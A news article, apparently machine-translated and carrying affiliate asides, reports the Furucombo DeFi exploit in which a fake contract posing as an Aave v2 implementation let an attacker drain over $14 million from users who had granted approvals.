DeFi exploits and attacks have become increasingly commonplace as space evolves and attracts both money and participants. The latest of these attacks took place today – over $ 14 million of crypto was stolen.

Furucombo attacked

Furucombo, an Ethereum-based transaction “batching” protocol (for instructions on how to buy Ethereum via Paypal ), announced this morning that the platform had been exploited and asked users to suspend all permissions as a precautionary measure.

The tool is designed for end users to optimize their DeFi strategy using a simple „drag-and-drop“ mechanism. The tool enables users who cannot code but understand the DeFi Markets to create and execute their own strategies.

The log experienced an exploit this morning. „We have deauthorized the relevant components and believe that the vulnerability is patched, but we recommend users to remove the shares out of sheer caution,“ said Furucombo in a tweet.

According to The Block researcher Igor Igamberdiev, the attacker was able to carry out the exploit by tricking Furucombo’s smart contracts into trusting and processing a fake data set belonging to the decentralized lending service Aave – a protocol that does Allows users to take out loans with collateral (or flash loans without collateral).

„An attacker who used a fake contract made Furuсombo believe that Aave v2 has a new implementation,“ Igamberdiev said in a tweet. As a result, all interactions with “Aave v2” were “approved” and sent to an address controlled by the hacker.

On-chain data also shows that the attacker transferred the funds of every user who “approved” Furucombo to conduct transactions on his behalf – and that resulted in over $ 14 million being stolen.

Over 3,900 stETH (a staked Ethereum token) and $ 2.4 million in stablecoin USDC were hit. The attackers have transferred their illegally obtained stash to the privacy mixer Tornado Cash – a tool that masks addresses and allows users to exchange cryptocurrencies (for instructions on how to buy Bitcoin with PayPal ) on the chain.

Users should be compensated

Hsuan-Ting, the CEO of Dinngo crypto exchange, the company that builds and maintains Furucombo, says the company is taking responsibility for the attack and is asking users not to worry about their losses.

“We calculate how much is lost,” says Hsuan-Ting.


“We keep everyone up to date. Together we are stronger.“

Meanwhile, Julien Bouteloup of Curve Finance said on Twitter that such “evil contracts” exploits are apparently the new “holy grail”.

He is likely referring to previous attacks on Alpha Finance and Pickle Finance, in which a similar „nasty contract“ pulled millions of dollars in cryptocurrencies by getting the logs to approve and accept bogus contracts.

At that time, however, the projects were able to avert further damage.